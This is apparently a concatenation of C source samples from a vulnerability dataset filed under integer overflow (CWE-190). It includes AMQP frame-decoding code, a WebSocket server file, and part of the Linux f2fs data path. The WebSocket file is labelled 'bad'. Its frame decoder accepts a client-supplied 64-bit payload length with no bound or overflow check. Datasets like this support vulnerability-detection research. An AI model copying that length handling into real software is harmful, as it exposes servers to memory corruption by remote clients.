return_to_idle(state);
return (int)bytes_consumed;
}
/* it's not a protocol header; fall through to process it as a
regular frame header */
case CONNECTION_STATE_HEADER: {
amqp_channel_t channel;
amqp_pool_t *channel_pool;
uint32_t frame_size;
channel = amqp_d16(amqp_offset(raw_frame, 1));
/* frame length is 3 bytes in */
frame_size = amqp_d32(amqp_offset(raw_frame, 3));
/* To prevent the target_size calculation below from overflowing, check
* that the stated frame_size is smaller than a signed 32-bit. Given
* the library only allows configuring frame_max as an int32_t, and
* frame_size is uint32_t, the math below is safe from overflow. */
if (frame_size >= INT32_MAX) {
return AMQP_STATUS_BAD_AMQP_DATA;
}
state->target_size = frame_size + HEADER_SIZE + FOOTER_SIZE;
if ((size_t)state->frame_max < state->target_size) {
return AMQP_STATUS_BAD_AMQP_DATA;
}
channel_pool = amqp_get_or_create_channel_pool(state, channel);
if (NULL == channel_pool) {
return AMQP_STATUS_NO_MEMORY;
}
amqp_pool_alloc_bytes(channel_pool, state->target_size,
&state->inbound_buffer);
if (NULL == state->inbound_buffer.bytes) {
return AMQP_STATUS_NO_MEMORY;
}
memcpy(state->inbound_buffer.bytes, state->header_buffer, HEADER_SIZE);
raw_frame = state->inbound_buffer.bytes;
state->state = CONNECTION_STATE_BODY;
bytes_consumed += consume_data(state, &received_data);
/* do we have target_size data yet? if not, return with the
expectation that more will arrive */
if (state->inbound_offset < state->target_size) {
return (int)bytes_consumed;
}
}
/* fall through to process body */
case CONNECTION_STATE_BODY: {
amqp_bytes_t encoded;
int res;
amqp_pool_t *channel_pool;
/* Check frame end marker (footer) */
if (amqp_d8(amqp_offset(raw_frame, state->target_size - 1)) !=
AMQP_FRAME_END) {
return AMQP_STATUS_BAD_AMQP_DATA;
}
decoded_frame->frame_type = amqp_d8(amqp_offset(raw_frame, 0));
decoded_frame->channel = amqp_d16(amqp_offset(raw_frame, 1));
channel_pool =
amqp_get_or_create_channel_pool(state, decoded_frame->channel);
if (NULL == channel_pool) {
return AMQP_STATUS_NO_MEMORY;
}
switch (decoded_frame->frame_type) {
case AMQP_FRAME_METHOD:
decoded_frame->payload.method.id =
amqp_d32(amqp_offset(raw_frame, HEADER_SIZE));
encoded.bytes = amqp_offset(raw_frame, HEADER_SIZE + 4);
encoded.len = state->target_size - HEADER_SIZE - 4 - FOOTER_SIZE;
res = amqp_decode_method(decoded_frame->payload.method.id,
channel_pool, encoded,
&decoded_frame->payload.method.decoded);
if (res < 0) {
return res;
}
break;
case AMQP_FRAME_HEADER:
decoded_frame->payload.properties.class_id =
amqp_d16(amqp_offset(raw_frame, HEADER_SIZE));
/* unused 2-byte weight field goes here */
decoded_frame->payload.properties.body_size =
amqp_d64(amqp_offset(raw_frame, HEADER_SIZE + 4));
encoded.bytes = amqp_offset(raw_frame, HEADER_SIZE + 12);
encoded.len = state->target_size - HEADER_SIZE - 12 - FOOTER_SIZE;
decoded_frame->payload.properties.raw = encoded;
res = amqp_decode_properties(
decoded_frame->payload.properties.class_id, channel_pool, encoded,
&decoded_frame->payload.properties.decoded);
if (res < 0) {
return res;
}
break;
case AMQP_FRAME_BODY:
decoded_frame->payload.body_fragment.len =
state->target_size - HEADER_SIZE - FOOTER_SIZE;
decoded_frame->payload.body_fragment.bytes =
amqp_offset(raw_frame, HEADER_SIZE);
break;
case AMQP_FRAME_HEARTBEAT:
break;
default:
/* Ignore the frame */
decoded_frame->frame_type = 0;
break;
}
return_to_idle(state);
return (int)bytes_consumed;
}
default:
amqp_abort("Internal error: invalid amqp_connection_state_t->state %d",
state->state);
}
}
amqp_boolean_t amqp_release_buffers_ok(amqp_connection_state_t state) {
return (state->state == CONNECTION_STATE_IDLE);
}
void amqp_release_buffers(amqp_connection_state_t state) {
int i;
ENFORCE_STATE(state, CONNECTION_STATE_IDLE);
for (i = 0; i < POOL_TABLE_SIZE; ++i) {
amqp_pool_table_entry_t *entry = state->pool_table[i];
for (; NULL != entry; entry = entry->next) {
amqp_maybe_release_buffers_on_channel(state, entry->channel);
}
}
}
void amqp_maybe_release_buffers(amqp_connection_state_t state) {
if (amqp_release_buffers_ok(state)) {
amqp_release_buffers(state);
}
}
void amqp_maybe_release_buffers_on_channel(amqp_connection_state_t state,
amqp_channel_t channel) {
amqp_link_t *queued_link;
amqp_pool_t *pool;
if (CONNECTION_STATE_IDLE != state->state) {
return;
}
queued_link = state->first_queued_frame;
while (NULL != queued_link) {
amqp_frame_t *frame = queued_link->data;
if (channel == frame->channel) {
return;
}
queued_link = queued_link->next;
}
pool = amqp_get_channel_pool(state, channel);
if (pool != NULL) {
recycle_amqp_pool(pool);
}
}
static int amqp_frame_to_bytes(const amqp_frame_t *frame, amqp_bytes_t buffer,
amqp_bytes_t *encoded) {
void *out_frame = buffer.bytes;
size_t out_frame_len;
int res;
amqp_e8(frame->frame_type, amqp_offset(out_frame, 0));
amqp_e16(frame->channel, amqp_offset(out_frame, 1));
switch (frame->frame_type) {
case AMQP_FRAME_BODY: {
const amqp_bytes_t *body = &frame->payload.body_fragment;
memcpy(amqp_offset(out_frame, HEADER_SIZE), body->bytes, body->len);
out_frame_len = body->len;
break;
}
case AMQP_FRAME_METHOD: {
amqp_bytes_t method_encoded;
amqp_e32(frame->payload.method.id, amqp_offset(out_frame, HEADER_SIZE));
method_encoded.bytes = amqp_offset(out_frame, HEADER_SIZE + 4);
method_encoded.len = buffer.len - HEADER_SIZE - 4 - FOOTER_SIZE;
res = amqp_encode_method(frame->payload.method.id,
frame->payload.method.decoded, method_encoded);
if (res < 0) {
return res;
}
out_frame_len = res + 4;
break;
}
case AMQP_FRAME_HEADER: {
amqp_bytes_t properties_encoded;
amqp_e16(frame->payload.properties.class_id,
amqp_offset(out_frame, HEADER_SIZE));
amqp_e16(0, amqp_offset(out_frame, HEADER_SIZE + 2)); /* "weight" */
amqp_e64(frame->payload.properties.body_size,
amqp_offset(out_frame, HEADER_SIZE + 4));
properties_encoded.bytes = amqp_offset(out_frame, HEADER_SIZE + 12);
properties_encoded.len = buffer.len - HEADER_SIZE - 12 - FOOTER_SIZE;
res = amqp_encode_properties(frame->payload.properties.class_id,
frame->payload.properties.decoded,
properties_encoded);
if (res < 0) {
return res;
}
out_frame_len = res + 12;
break;
}
case AMQP_FRAME_HEARTBEAT:
out_frame_len = 0;
break;
default:
return AMQP_STATUS_INVALID_PARAMETER;
}
amqp_e32((uint32_t)out_frame_len, amqp_offset(out_frame, 3));
amqp_e8(AMQP_FRAME_END, amqp_offset(out_frame, HEADER_SIZE + out_frame_len));
encoded->bytes = out_frame;
encoded->len = out_frame_len + HEADER_SIZE + FOOTER_SIZE;
return AMQP_STATUS_OK;
}
int amqp_send_frame(amqp_connection_state_t state, const amqp_frame_t *frame) {
return amqp_send_frame_inner(state, frame, AMQP_SF_NONE,
amqp_time_infinite());
}
int amqp_send_frame_inner(amqp_connection_state_t state,
const amqp_frame_t *frame, int flags,
amqp_time_t deadline) {
int res;
ssize_t sent;
amqp_bytes_t encoded;
amqp_time_t next_timeout;
/* TODO: if the AMQP_SF_MORE socket optimization can be shown to work
* correctly, then this could be un-done so that body-frames are sent as 3
* send calls, getting rid of the copy of the body content, some testing
* would need to be done to see if this would actually a win for performance.
* */
res = amqp_frame_to_bytes(frame, state->outbound_buffer, &encoded);
if (AMQP_STATUS_OK != res) {
return res;
}
start_send:
next_timeout = amqp_time_first(deadline, state->next_recv_heartbeat);
sent = amqp_try_send(state, encoded.bytes, encoded.len, next_timeout, flags);
if (0 > sent) {
return (int)sent;
}
/* A partial send has occurred, because of a heartbeat timeout (so try recv
* something) or common timeout (so return AMQP_STATUS_TIMEOUT) */
if ((ssize_t)encoded.len != sent) {
if (amqp_time_equal(next_timeout, deadline)) {
/* timeout of method was received, so return from method*/
return AMQP_STATUS_TIMEOUT;
}
res = amqp_try_recv(state);
if (AMQP_STATUS_TIMEOUT == res) {
return AMQP_STATUS_HEARTBEAT_TIMEOUT;
} else if (AMQP_STATUS_OK != res) {
return res;
}
encoded.bytes = (uint8_t *)encoded.bytes + sent;
encoded.len -= sent;
goto start_send;
}
res = amqp_time_s_from_now(&state->next_send_heartbeat,
amqp_heartbeat_send(state));
return res;
}
amqp_table_t *amqp_get_server_properties(amqp_connection_state_t state) {
return &state->server_properties;
}
amqp_table_t *amqp_get_client_properties(amqp_connection_state_t state) {
return &state->client_properties;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_1203_0 |
crossvul-cpp_data_bad_402_3 | /*
* Description:
* History: yang@haipo.me, 2017/04/26, create
*/
# include <stdbool.h>
# include <openssl/sha.h>
# include "ut_log.h"
# include "ut_misc.h"
# include "ut_base64.h"
# include "ut_ws_svr.h"
struct ws_frame {
uint8_t fin;
uint8_t opcode;
uint64_t payload_len;
void *payload;
};
struct clt_info {
nw_ses *ses;
void *privdata;
double last_activity;
struct http_parser parser;
sds field;
bool field_set;
sds value;
bool value_set;
bool upgrade;
sds remote;
sds url;
sds message;
http_request_t *request;
struct ws_frame frame;
};
static int on_http_message_begin(http_parser* parser)
{
struct clt_info *info = parser->data;
if (info->request)
http_request_release(info->request);
info->request = http_request_new();
if (info->request == NULL) {
return -__LINE__;
}
return 0;
}
static int send_hand_shake_reply(nw_ses *ses, char *protocol, const char *key)
{
unsigned char hash[20];
sds data = sdsnew(key);
data = sdscat(data, "258EAFA5-E914-47DA-95CA-C5AB0DC85B11");
SHA1((const unsigned char *)data, sdslen(data), hash);
sdsfree(data);
sds b4message;
base64_encode(hash, sizeof(hash), &b4message);
http_response_t *response = http_response_new();
http_response_set_header(response, "Upgrade", "websocket");
http_response_set_header(response, "Connection", "Upgrade");
http_response_set_header(response, "Sec-WebSocket-Accept", b4message);
if (protocol) {
http_response_set_header(response, "Sec-WebSocket-Protocol", protocol);
}
response->status = 101;
sds message = http_response_encode(response);
nw_ses_send(ses, message, sdslen(message));
sdsfree(message);
sdsfree(b4message);
return 0;
}
static bool is_good_protocol(const char *protocol_list, const char *protocol)
{
char *tmp = strdup(protocol_list);
char *pch = strtok(tmp, ", ");
while (pch != NULL) {
if (strcmp(pch, protocol) == 0) {
free(tmp);
return true;
}
pch = strtok(NULL, ", ");
}
free(tmp);
return false;
}
static bool is_good_origin(const char *origin, const char *require)
{
size_t origin_len = strlen(origin);
size_t require_len = strlen(require);
if (origin_len < require_len)
return false;
if (memcmp(origin + (origin_len - require_len), require, require_len) != 0)
return false;
return true;
}
static int on_http_message_complete(http_parser* parser)
{
struct clt_info *info = parser->data;
ws_svr *svr = ws_svr_from_ses(info->ses);
info->request->version_major = parser->http_major;
info->request->version_minor = parser->http_minor;
info->request->method = parser->method;
dict_entry *entry;
dict_iterator *iter = dict_get_iterator(info->request->headers);
while ((entry = dict_next(iter)) != NULL) {
log_trace("Header: %s: %s", (char *)entry->key, (char *)entry->val);
}
dict_release_iterator(iter);
if (info->request->method != HTTP_GET)
goto error;
if (http_request_get_header(info->request, "Host") == NULL)
goto error;
double version = info->request->version_major + info->request->version_minor * 0.1;
if (version < 1.1)
goto error;
const char *upgrade = http_request_get_header(info->request, "Upgrade");
if (upgrade == NULL || strcasecmp(upgrade, "websocket") != 0)
goto error;
const char *connection = http_request_get_header(info->request, "Connection");
if (connection == NULL)
goto error;
else {
bool found_upgrade = false;
int count;
sds *tokens = sdssplitlen(connection, strlen(connection), ",", 1, &count);
if (tokens == NULL)
goto error;
for (int i = 0; i < count; i++) {
sds token = tokens[i];
sdstrim(token, " ");
if (strcasecmp(token, "Upgrade") == 0) {
found_upgrade = true;
break;
}
}
sdsfreesplitres(tokens, count);
if (!found_upgrade)
goto error;
}
const char *ws_version = http_request_get_header(info->request, "Sec-WebSocket-Version");
if (ws_version == NULL || strcmp(ws_version, "13") != 0)
goto error;
const char *ws_key = http_request_get_header(info->request, "Sec-WebSocket-Key");
if (ws_key == NULL)
goto error;
const char *protocol_list = http_request_get_header(info->request, "Sec-WebSocket-Protocol");
if (protocol_list && !is_good_protocol(protocol_list, svr->protocol))
goto error;
if (strlen(svr->origin) > 0) {
const char *origin = http_request_get_header(info->request, "Origin");
if (origin == NULL || !is_good_origin(origin, svr->origin))
goto error;
}
if (svr->type.on_privdata_alloc) {
info->privdata = svr->type.on_privdata_alloc(svr);
if (info->privdata == NULL)
goto error;
}
info->upgrade = true;
info->remote = sdsnew(http_get_remote_ip(info->ses, info->request));
info->url = sdsnew(info->request->url);
if (svr->type.on_upgrade) {
svr->type.on_upgrade(info->ses, info->remote);
}
if (protocol_list) {
send_hand_shake_reply(info->ses, svr->protocol, ws_key);
} else {
send_hand_shake_reply(info->ses, NULL, ws_key);
}
return 0;
error:
ws_svr_close_clt(ws_svr_from_ses(info->ses), info->ses);
return -1;
}
static int on_http_url(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
if (info->request->url)
sdsfree(info->request->url);
info->request->url = sdsnewlen(at, length);
return 0;
}
static int on_http_header_field(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->field_set = true;
if (info->field == NULL) {
info->field = sdsnewlen(at, length);
} else {
info->field = sdscpylen(info->field, at, length);
}
return 0;
}
static int on_http_header_value(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->value_set = true;
if (info->value == NULL) {
info->value = sdsnewlen(at, length);
} else {
info->value = sdscpylen(info->value, at, length);
}
if (info->field_set && info->value_set) {
http_request_set_header(info->request, info->field, info->value);
info->field_set = false;
info->value_set = false;
}
return 0;
}
static int on_http_body(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->request->body = sdsnewlen(at, length);
return 0;
}
static bool is_good_opcode(uint8_t opcode)
{
static uint8_t good_list[] = { 0x0, 0x1, 0x2, 0x8, 0x9, 0xa };
for (size_t i = 0; i < sizeof(good_list); ++i) {
if (opcode == good_list[i])
return true;
}
return false;
}
static int decode_pkg(nw_ses *ses, void *data, size_t max)
{
struct clt_info *info = ses->privdata;
if (!info->upgrade) {
return max;
}
if (max < 2)
return 0;
uint8_t *p = data;
size_t pkg_size = 0;
memset(&info->frame, 0, sizeof(info->frame));
info->frame.fin = p[0] & 0x80;
info->frame.opcode = p[0] & 0x0f;
if (!is_good_opcode(info->frame.opcode))
return -1;
uint8_t mask = p[1] & 0x80;
if (mask == 0)
return -1;
uint8_t len = p[1] & 0x7f;
if (len < 126) {
pkg_size = 2;
info->frame.payload_len = len;
} else if (len == 126) {
pkg_size = 2 + 2;
if (max < pkg_size)
return 0;
info->frame.payload_len = be16toh(*(uint16_t *)(p + 2));
} else if (len == 127) {
pkg_size = 2 + 8;
if (max < pkg_size)
return 0;
info->frame.payload_len = be64toh(*(uint64_t *)(p + 2));
}
uint8_t masks[4];
memcpy(masks, p + pkg_size, sizeof(masks));
pkg_size += sizeof(masks);
info->frame.payload = p + pkg_size;
pkg_size += info->frame.payload_len;
if (max < pkg_size)
return 0;
p = info->frame.payload;
for (size_t i = 0; i < info->frame.payload_len; ++i) {
p[i] = p[i] ^ masks[i & 3];
}
return pkg_size;
}
static void on_error_msg(nw_ses *ses, const char *msg)
{
log_error("peer: %s: %s", nw_sock_human_addr(&ses->peer_addr), msg);
}
static void on_new_connection(nw_ses *ses)
{
log_trace("new connection from: %s", nw_sock_human_addr(&ses->peer_addr));
struct clt_info *info = ses->privdata;
memset(info, 0, sizeof(struct clt_info));
info->ses = ses;
info->last_activity = current_timestamp();
http_parser_init(&info->parser, HTTP_REQUEST);
info->parser.data = info;
}
static void on_connection_close(nw_ses *ses)
{
log_trace("connection %s close", nw_sock_human_addr(&ses->peer_addr));
struct clt_info *info = ses->privdata;
struct ws_svr *svr = ws_svr_from_ses(ses);
if (info->upgrade) {
if (svr->type.on_close) {
svr->type.on_close(ses, info->remote);
}
if (svr->type.on_privdata_free) {
svr->type.on_privdata_free(svr, info->privdata);
}
}
}
static void *on_privdata_alloc(void *svr)
{
ws_svr *w_svr = ((nw_svr *)svr)->privdata;
return nw_cache_alloc(w_svr->privdata_cache);
}
static void on_privdata_free(void *svr, void *privdata)
{
struct clt_info *info = privdata;
if (info->field) {
sdsfree(info->field);
}
if (info->value) {
sdsfree(info->value);
}
if (info->remote) {
sdsfree(info->remote);
}
if (info->url) {
sdsfree(info->url);
}
if (info->message) {
sdsfree(info->message);
}
if (info->request) {
http_request_release(info->request);
}
ws_svr *w_svr = ((nw_svr *)svr)->privdata;
nw_cache_free(w_svr->privdata_cache, privdata);
}
static int send_reply(nw_ses *ses, uint8_t opcode, void *payload, size_t payload_len)
{
if (payload == NULL)
payload_len = 0;
static void *buf;
static size_t buf_size = 1024;
if (buf == NULL) {
buf = malloc(1024);
if (buf == NULL)
return -1;
}
size_t require_len = 10 + payload_len;
if (buf_size < require_len) {
void *new = realloc(buf, require_len);
if (new == NULL)
return -1;
buf = new;
buf_size = require_len;
}
size_t pkg_len = 0;
uint8_t *p = buf;
p[0] = 0;
p[0] |= 0x1 << 7;
p[0] |= opcode;
p[1] = 0;
if (payload_len < 126) {
uint8_t len = payload_len;
p[1] |= len;
pkg_len = 2;
} else if (payload_len <= 0xffff) {
p[1] |= 126;
uint16_t len = htobe16((uint16_t)payload_len);
memcpy(p + 2, &len, sizeof(len));
pkg_len = 2 + sizeof(len);
} else {
p[1] |= 127;
uint64_t len = htobe64(payload_len);
memcpy(p + 2, &len, sizeof(len));
pkg_len = 2 + sizeof(len);
}
if (payload) {
memcpy(p + pkg_len, payload, payload_len);
pkg_len += payload_len;
}
return nw_ses_send(ses, buf, pkg_len);
}
static int send_pong_message(nw_ses *ses)
{
return send_reply(ses, 0xa, NULL, 0);
}
static void on_recv_pkg(nw_ses *ses, void *data, size_t size)
{
struct clt_info *info = ses->privdata;
ws_svr *svr = ws_svr_from_ses(ses);
info->last_activity = current_timestamp();
if (!info->upgrade) {
size_t nparsed = http_parser_execute(&info->parser, &svr->settings, data, size);
if (!info->parser.upgrade && nparsed != size) {
log_error("peer: %s http parse error: %s (%s)", nw_sock_human_addr(&ses->peer_addr),
http_errno_description(HTTP_PARSER_ERRNO(&info->parser)),
http_errno_name(HTTP_PARSER_ERRNO(&info->parser)));
nw_svr_close_clt(svr->raw_svr, ses);
}
return;
}
switch (info->frame.opcode) {
case 0x8:
nw_svr_close_clt(svr->raw_svr, ses);
return;
case 0x9:
send_pong_message(ses);
return;
case 0xa:
return;
}
if (info->message == NULL)
info->message = sdsempty();
info->message = sdscatlen(info->message, info->frame.payload, info->frame.payload_len);
if (info->frame.fin) {
int ret = svr->type.on_message(ses, info->remote, info->url, info->message, sdslen(info->message));
if (ses->id != 0) {
if (ret < 0) {
nw_svr_close_clt(svr->raw_svr, ses);
} else {
sdsfree(info->message);
info->message = NULL;
}
}
}
}
static void on_timer(nw_timer *timer, void *privdata)
{
ws_svr *svr = privdata;
double now = current_timestamp();
nw_ses *curr = svr->raw_svr->clt_list_head;
nw_ses *next;
while (curr) {
next = curr->next;
struct clt_info *info = curr->privdata;
if (now - info->last_activity > svr->keep_alive) {
log_error("peer: %s: last_activity: %f, idle too long", nw_sock_human_addr(&curr->peer_addr), info->last_activity);
nw_svr_close_clt(svr->raw_svr, curr);
}
curr = next;
}
}
ws_svr *ws_svr_create(ws_svr_cfg *cfg, ws_svr_type *type)
{
if (type->on_message == NULL)
return NULL;
if (type->on_privdata_alloc && !type->on_privdata_free)
return NULL;
ws_svr *svr = malloc(sizeof(ws_svr));
memset(svr, 0, sizeof(ws_svr));
nw_svr_cfg raw_cfg;
memset(&raw_cfg, 0, sizeof(raw_cfg));
raw_cfg.bind_count = cfg->bind_count;
raw_cfg.bind_arr = cfg->bind_arr;
raw_cfg.max_pkg_size = cfg->max_pkg_size;
raw_cfg.buf_limit = cfg->buf_limit;
raw_cfg.read_mem = cfg->read_mem;
raw_cfg.write_mem = cfg->write_mem;
nw_svr_type st;
memset(&st, 0, sizeof(st));
st.decode_pkg = decode_pkg;
st.on_error_msg = on_error_msg;
st.on_new_connection = on_new_connection;
st.on_connection_close = on_connection_close;
st.on_recv_pkg = on_recv_pkg;
st.on_privdata_alloc = on_privdata_alloc;
st.on_privdata_free = on_privdata_free;
svr->raw_svr = nw_svr_create(&raw_cfg, &st, svr);
if (svr->raw_svr == NULL) {
free(svr);
return NULL;
}
memset(&svr->settings, 0, sizeof(http_parser_settings));
svr->settings.on_message_begin = on_http_message_begin;
svr->settings.on_url = on_http_url;
svr->settings.on_header_field = on_http_header_field;
svr->settings.on_header_value = on_http_header_value;
svr->settings.on_body = on_http_body;
svr->settings.on_message_complete = on_http_message_complete;
svr->keep_alive = cfg->keep_alive;
svr->protocol = strdup(cfg->protocol);
svr->origin = strdup(cfg->origin);
svr->privdata_cache = nw_cache_create(sizeof(struct clt_info));
memcpy(&svr->type, type, sizeof(ws_svr_type));
if (cfg->keep_alive > 0) {
nw_timer_set(&svr->timer, 60, true, on_timer, svr);
nw_timer_start(&svr->timer);
}
return svr;
}
int ws_svr_start(ws_svr *svr)
{
int ret = nw_svr_start(svr->raw_svr);
if (ret < 0)
return ret;
return 0;
}
int ws_svr_stop(ws_svr *svr)
{
int ret = nw_svr_stop(svr->raw_svr);
if (ret < 0)
return ret;
return 0;
}
ws_svr *ws_svr_from_ses(nw_ses *ses)
{
return ((nw_svr *)ses->svr)->privdata;
}
void *ws_ses_privdata(nw_ses *ses)
{
struct clt_info *info = ses->privdata;
return info->privdata;
}
int ws_send_text(nw_ses *ses, char *message)
{
return send_reply(ses, 0x1, message, strlen(message));
}
int ws_send_binary(nw_ses *ses, void *data, size_t size)
{
return send_reply(ses, 0x2, data, size);
}
static int broadcast_message(ws_svr *svr, uint8_t opcode, void *data, size_t size)
{
nw_ses *curr = svr->raw_svr->clt_list_head;
while (curr) {
nw_ses *next = curr->next;
struct clt_info *info = curr->privdata;
if (info->upgrade) {
int ret = send_reply(curr, opcode, data, size);
if (ret < 0)
return ret;
}
curr = next;
}
return 0;
}
int ws_svr_broadcast_text(ws_svr *svr, char *message)
{
return broadcast_message(svr, 0x1, message, strlen(message));
}
int ws_svr_broadcast_binary(ws_svr *svr, void *data, size_t size)
{
return broadcast_message(svr, 0x2, data, size);
}
void ws_svr_close_clt(ws_svr *svr, nw_ses *ses)
{
nw_svr_close_clt(svr->raw_svr, ses);
}
void ws_svr_release(ws_svr *svr)
{
nw_svr_release(svr->raw_svr);
nw_timer_stop(&svr->timer);
nw_cache_release(svr->privdata_cache);
free(svr->protocol);
free(svr);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_402_3 |
crossvul-cpp_data_good_3028_0 | /*
* fs/f2fs/data.c
*
* Copyright (c) 2012 Samsung Electronics Co., Ltd.
* http://www.samsung.com/
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*/
#include <linux/fs.h>
#include <linux/f2fs_fs.h>
#include <linux/buffer_head.h>
#include <linux/mpage.h>
#include <linux/writeback.h>
#include <linux/backing-dev.h>
#include <linux/pagevec.h>
#include <linux/blkdev.h>
#include <linux/bio.h>
#include <linux/prefetch.h>
#include <linux/uio.h>
#include <linux/mm.h>
#include <linux/memcontrol.h>
#include <linux/cleancache.h>
#include "f2fs.h"
#include "node.h"
#include "segment.h"
#include "trace.h"
#include <trace/events/f2fs.h>
static bool __is_cp_guaranteed(struct page *page)
{
struct address_space *mapping = page->mapping;
struct inode *inode;
struct f2fs_sb_info *sbi;
if (!mapping)
return false;
inode = mapping->host;
sbi = F2FS_I_SB(inode);
if (inode->i_ino == F2FS_META_INO(sbi) ||
inode->i_ino == F2FS_NODE_INO(sbi) ||
S_ISDIR(inode->i_mode) ||
is_cold_data(page))
return true;
return false;
}
static void f2fs_read_end_io(struct bio *bio)
{
struct bio_vec *bvec;
int i;
#ifdef CONFIG_F2FS_FAULT_INJECTION
if (time_to_inject(F2FS_P_SB(bio->bi_io_vec->bv_page), FAULT_IO))
bio->bi_error = -EIO;
#endif
if (f2fs_bio_encrypted(bio)) {
if (bio->bi_error) {
fscrypt_release_ctx(bio->bi_private);
} else {
fscrypt_decrypt_bio_pages(bio->bi_private, bio);
return;
}
}
bio_for_each_segment_all(bvec, bio, i) {
struct page *page = bvec->bv_page;
if (!bio->bi_error) {
if (!PageUptodate(page))
SetPageUptodate(page);
} else {
ClearPageUptodate(page);
SetPageError(page);
}
unlock_page(page);
}
bio_put(bio);
}
static void f2fs_write_end_io(struct bio *bio)
{
struct f2fs_sb_info *sbi = bio->bi_private;
struct bio_vec *bvec;
int i;
bio_for_each_segment_all(bvec, bio, i) {
struct page *page = bvec->bv_page;
enum count_type type = WB_DATA_TYPE(page);
if (IS_DUMMY_WRITTEN_PAGE(page)) {
set_page_private(page, (unsigned long)NULL);
ClearPagePrivate(page);
unlock_page(page);
mempool_free(page, sbi->write_io_dummy);
if (unlikely(bio->bi_error))
f2fs_stop_checkpoint(sbi, true);
continue;
}
fscrypt_pullback_bio_page(&page, true);
if (unlikely(bio->bi_error)) {
mapping_set_error(page->mapping, -EIO);
f2fs_stop_checkpoint(sbi, true);
}
dec_page_count(sbi, type);
clear_cold_data(page);
end_page_writeback(page);
}
if (!get_pages(sbi, F2FS_WB_CP_DATA) &&
wq_has_sleeper(&sbi->cp_wait))
wake_up(&sbi->cp_wait);
bio_put(bio);
}
/*
* Return true, if pre_bio's bdev is same as its target device.
*/
struct block_device *f2fs_target_device(struct f2fs_sb_info *sbi,
block_t blk_addr, struct bio *bio)
{
struct block_device *bdev = sbi->sb->s_bdev;
int i;
for (i = 0; i < sbi->s_ndevs; i++) {
if (FDEV(i).start_blk <= blk_addr &&
FDEV(i).end_blk >= blk_addr) {
blk_addr -= FDEV(i).start_blk;
bdev = FDEV(i).bdev;
break;
}
}
if (bio) {
bio->bi_bdev = bdev;
bio->bi_iter.bi_sector = SECTOR_FROM_BLOCK(blk_addr);
}
return bdev;
}
int f2fs_target_device_index(struct f2fs_sb_info *sbi, block_t blkaddr)
{
int i;
for (i = 0; i < sbi->s_ndevs; i++)
if (FDEV(i).start_blk <= blkaddr && FDEV(i).end_blk >= blkaddr)
return i;
return 0;
}
static bool __same_bdev(struct f2fs_sb_info *sbi,
block_t blk_addr, struct bio *bio)
{
return f2fs_target_device(sbi, blk_addr, NULL) == bio->bi_bdev;
}
/*
* Low-level block read/write IO operations.
*/
static struct bio *__bio_alloc(struct f2fs_sb_info *sbi, block_t blk_addr,
int npages, bool is_read)
{
struct bio *bio;
bio = f2fs_bio_alloc(npages);
f2fs_target_device(sbi, blk_addr, bio);
bio->bi_end_io = is_read ? f2fs_read_end_io : f2fs_write_end_io;
bio->bi_private = is_read ? NULL : sbi;
return bio;
}
static inline void __submit_bio(struct f2fs_sb_info *sbi,
struct bio *bio, enum page_type type)
{
if (!is_read_io(bio_op(bio))) {
unsigned int start;
if (f2fs_sb_mounted_blkzoned(sbi->sb) &&
current->plug && (type == DATA || type == NODE))
blk_finish_plug(current->plug);
if (type != DATA && type != NODE)
goto submit_io;
start = bio->bi_iter.bi_size >> F2FS_BLKSIZE_BITS;
start %= F2FS_IO_SIZE(sbi);
if (start == 0)
goto submit_io;
/* fill dummy pages */
for (; start < F2FS_IO_SIZE(sbi); start++) {
struct page *page =
mempool_alloc(sbi->write_io_dummy,
GFP_NOIO | __GFP_ZERO | __GFP_NOFAIL);
f2fs_bug_on(sbi, !page);
SetPagePrivate(page);
set_page_private(page, (unsigned long)DUMMY_WRITTEN_PAGE);
lock_page(page);
if (bio_add_page(bio, page, PAGE_SIZE, 0) < PAGE_SIZE)
f2fs_bug_on(sbi, 1);
}
/*
* In the NODE case, we lose next block address chain. So, we
* need to do checkpoint in f2fs_sync_file.
*/
if (type == NODE)
set_sbi_flag(sbi, SBI_NEED_CP);
}
submit_io:
if (is_read_io(bio_op(bio)))
trace_f2fs_submit_read_bio(sbi->sb, type, bio);
else
trace_f2fs_submit_write_bio(sbi->sb, type, bio);
submit_bio(bio);
}
static void __submit_merged_bio(struct f2fs_bio_info *io)
{
struct f2fs_io_info *fio = &io->fio;
if (!io->bio)
return;
bio_set_op_attrs(io->bio, fio->op, fio->op_flags);
if (is_read_io(fio->op))
trace_f2fs_prepare_read_bio(io->sbi->sb, fio->type, io->bio);
else
trace_f2fs_prepare_write_bio(io->sbi->sb, fio->type, io->bio);
__submit_bio(io->sbi, io->bio, fio->type);
io->bio = NULL;
}
static bool __has_merged_page(struct f2fs_bio_info *io, struct inode *inode,
struct page *page, nid_t ino)
{
struct bio_vec *bvec;
struct page *target;
int i;
if (!io->bio)
return false;
if (!inode && !page && !ino)
return true;
bio_for_each_segment_all(bvec, io->bio, i) {
if (bvec->bv_page->mapping)
target = bvec->bv_page;
else
target = fscrypt_control_page(bvec->bv_page);
if (inode && inode == target->mapping->host)
return true;
if (page && page == target)
return true;
if (ino && ino == ino_of_node(target))
return true;
}
return false;
}
static bool has_merged_page(struct f2fs_sb_info *sbi, struct inode *inode,
struct page *page, nid_t ino,
enum page_type type)
{
enum page_type btype = PAGE_TYPE_OF_BIO(type);
struct f2fs_bio_info *io = &sbi->write_io[btype];
bool ret;
down_read(&io->io_rwsem);
ret = __has_merged_page(io, inode, page, ino);
up_read(&io->io_rwsem);
return ret;
}
static void __f2fs_submit_merged_bio(struct f2fs_sb_info *sbi,
struct inode *inode, struct page *page,
nid_t ino, enum page_type type, int rw)
{
enum page_type btype = PAGE_TYPE_OF_BIO(type);
struct f2fs_bio_info *io;
io = is_read_io(rw) ? &sbi->read_io : &sbi->write_io[btype];
down_write(&io->io_rwsem);
if (!__has_merged_page(io, inode, page, ino))
goto out;
/* change META to META_FLUSH in the checkpoint procedure */
if (type >= META_FLUSH) {
io->fio.type = META_FLUSH;
io->fio.op = REQ_OP_WRITE;
io->fio.op_flags = REQ_PREFLUSH | REQ_META | REQ_PRIO;
